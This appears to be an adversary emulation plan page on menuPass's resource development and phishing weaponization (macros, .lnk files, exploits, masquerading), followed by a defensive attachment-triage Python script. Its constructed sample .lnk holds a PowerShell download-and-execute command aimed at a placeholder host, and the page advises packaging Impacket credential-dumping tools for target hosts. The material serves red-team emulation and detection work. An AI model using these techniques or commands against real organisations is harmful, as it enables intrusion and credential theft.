- Emulating reconnaissance and resource development such as information gathering, capability development, and weaponization.
- This step is not necessary to remain operationally representative but should be considered if you intend to attain initial access via phishing.
- Step 1 - Information Gathering
- Step 2 - Building Capabilities
- Step 3 - Weaponization
- Step 4 - Establish and Maintain Infrastructure
It is difficult to determine precisely how menuPass prepares for an operation. We can, however, assume that menuPass actors, after carefully selecting a target, perform some degree of technical, social, and organizational information gathering.[4] This is also likely the stage at which menuPass actors acquire publicly available documents from the organization they intend to target, for later weaponization.[4] They use the information from these efforts to identify the individuals to be targeted and to develop pretexts for social engineering (phishing) attacks.[4] If you intend to phish, this is the time to identify targets, develop a pretext, and collect documents for weaponization.
menuPass is reported to have used both custom and publicly available tools. This is the appropriate time to identify the C2 framework you will be using, select exploits (if you intend to use them), generate payloads, and compile and rename tools. menuPass is reported to have made use of several tools from the Impacket suite.[7] Scripts such as atexec.py, secretsdump.py, and psexec.py should be packaged into standalone executables with a Python-to-executable compiler (for example PyInstaller), so that they run on target hosts that have no Python interpreter installed. You may also elect to use prebuilt binaries of these tools instead.
menuPass is reported to have weaponized documents discovered during information gathering that were perceived to be of interest to the intended target. These documents were weaponized with either an exploit or a macro that would inject tactical malware such as ChChes, EvilGrab, or Koadic. The purpose of using a tactical implant during delivery is to minimize the risk to, and later correlation with, the strategically emplaced sustained implants used for persistence at a later stage in the operation. menuPass is widely reported to have weaponized these email messages in one of four ways:
- Macro
- .lnk file
- Exploit
- Masquerading
menuPass actors are widely reported to have weaponized password-protected MS Word/Excel documents with embedded VBA macros.[9] After entering the document password, the intended recipient is prompted to "enable content/macros." The password protection also keeps the macro out of reach of mail gateway scanners until the recipient opens the document. If macros are enabled, the macro typically dropped files to a temp folder, decoded them, executed them, and then deleted them. This execution resulted in DLL sideloading and the subsequent establishment of C2 on the infected host.[8][9]
menuPass is also reported to have attached zip files that contained .lnk files. When opened, the .lnk file launched the command prompt, which in turn used PowerShell to download and execute a second PowerShell script.[4][7] This script was responsible for situating a tactical implant in memory.[4][7][11][20][24]
menuPass may have weaponized documents with exploits targeting vulnerabilities in Microsoft products.[15][16] These exploits were responsible for achieving arbitrary code execution and subsequently downloading a tactical implant such as Koadic and situating it in memory.[15][16]
The final observed method of weaponization is masquerading. menuPass is reported to have attached digitally signed versions of ChChes and other tactical implants to email messages and modified the icon of the attachment to match that of a Microsoft Word document, so that an executable appeared to the recipient as a document.[1]
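The four delivery shapes described above (macro document, zipped .lnk, exploit document, and an executable masquerading as a Word file) can all be triaged from the attachment bytes alone, without opening anything. The following is an added example, not code from the menuPass emulation plan or from any tool it cites. It classifies an attachment by magic bytes rather than by name, reports an extension/content mismatch (the masquerading case), looks for a VBA project inside an OOXML container (the macro case), and parses Shell Link files far enough to recover the command line they run (the .lnk case). The extension table and the PowerShell cue list are assumptions chosen for illustration, and every sample file is constructed in memory; no real payload is embedded, downloaded, or executed.

```python
"""Attachment triage for the weaponization methods described on this page.

Added example, not code from the menuPass emulation plan. All sample files
are constructed in memory below (see build_lnk, sample_pe, sample_zip).
"""
import io
import struct
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046, on-disk order
# Legitimate container shapes per extension (assumption: small illustrative table).
# A password protected OOXML file is stored inside an OLE2 compound file, so
# "ole2" is a valid shape for .docx/.docm as well.
EXPECTED = {
    "doc": {"ole2"}, "xls": {"ole2"}, "exe": {"pe"}, "lnk": {"lnk"}, "zip": {"zip"},
    "docx": {"ooxml", "ole2"}, "docm": {"ooxml", "ole2"},
    "xlsx": {"ooxml", "ole2"}, "xlsm": {"ooxml", "ole2"},
}
# Cues for the cmd.exe -> PowerShell download-and-run chain (assumption: illustrative, not exhaustive).
LNK_CUES = ("powershell", "downloadstring", "downloadfile", "iex",
            "invoke-expression", "-enc", "frombase64string", "mshta")


def parse_lnk(data):
    """Parse an MS-SHLLINK file far enough to recover its StringData fields."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                                   # fixed-size ShellLinkHeader
    if flags & 0x01:                             # HasLinkTargetIDList: 2-byte size + list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:                             # HasLinkInfo: 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, enc = (2, "utf-16-le") if flags & 0x80 else (1, "cp1252")   # IsUnicode
    fields = {}
    for bit, name in ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                      (0x20, "arguments"), (0x40, "icon_location")):
        if flags & bit:                          # CountCharacters, then the string, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            fields[name] = data[pos + 2:pos + 2 + count * width].decode(enc)
            pos += 2 + count * width
    return fields


def classify(data):
    """Identify the container by content, never by file name or icon."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
    if data[:8] == OLE2_MAGIC:
        return "ole2"
    if data[:4] == b"PK\x03\x04":
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return "ooxml" if "[Content_Types].xml" in z.namelist() else "zip"
    if data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID:
        return "lnk"
    return "unknown"


def lnk_findings(data):
    """Describe a shell link whose target or arguments match the PowerShell cues."""
    try:
        f = parse_lnk(data)
    except ValueError:
        return ["named .lnk but not a valid shell link"]
    text = (f.get("relative_path", "") + " " + f.get("arguments", "")).lower()
    hits = [c for c in LNK_CUES if c in text]
    return [f"shell link runs {f.get('relative_path', '?')} with cues {hits}"] if hits else []


def triage(filename, data):
    """Return the detected kind plus a list of findings for one attachment."""
    kind = classify(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    findings = []
    if ext in EXPECTED and kind not in EXPECTED[ext]:
        findings.append(f"extension .{ext} does not match content type {kind}")
    if kind == "pe":
        findings.append("PE executable attachment; the icon it displays proves nothing")
    elif kind == "ooxml":
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            if any(n.lower().endswith("vbaproject.bin") for n in z.namelist()):
                findings.append("OOXML document contains a VBA project")
    elif kind == "ole2" and ext in ("docx", "docm", "xlsx", "xlsm"):
        findings.append("OLE2 container behind an OOXML extension: probably password "
                        "protected; macros cannot be inspected before decryption")
    elif kind == "lnk":
        findings.extend(lnk_findings(data))
    elif kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for name in z.namelist():
                if name.lower().endswith(".lnk"):
                    findings.extend(f"{name}: {x}" for x in lnk_findings(z.read(name)))
    return {"kind": kind, "findings": findings}


# --- constructed samples, no real payloads ----------------------------------
def build_lnk(relative_path, arguments, icon_location):
    """Minimal Unicode shell link with only RelativePath, Arguments and IconLocation set."""
    flags = 0x08 | 0x20 | 0x40 | 0x80
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + b"\x00" * (0x4C - 24)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location))
    return header + body


def sample_lnk():
    """Constructed .lnk of the cmd.exe -> PowerShell download-and-run shape (URL is a placeholder)."""
    return build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                     "/c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/s.ps1')\"",
                     r"%SystemRoot%\System32\shell32.dll")


def sample_pe():
    """Constructed MZ/PE header only: enough for classify(), not a runnable program."""
    pe = bytearray(0x44)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)       # e_lfanew -> "PE\0\0"
    pe[0x40:0x44] = b"PE\x00\x00"
    return bytes(pe)


def sample_zip(members):
    """In-memory zip from {name: str | bytes}; serves as both OOXML and plain archive samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in members.items():
            z.writestr(name, content)
    return buf.getvalue()
```

Run `triage("Quotation.doc", sample_pe())` to see the masquerading case reported as both an extension mismatch and an executable, `triage("Invoice.zip", sample_zip({"Invoice.lnk": sample_lnk()}))` to see the command line recovered from inside the archive, and `triage("Budget.docx", OLE2_MAGIC + b"\x00" * 504)` for the password-protected case, which the triage can only flag, not inspect. A legacy .doc/.xls is an OLE2 compound file in either case, so inspecting its VBA streams needs a dedicated OLE parser, which this example deliberately leaves out.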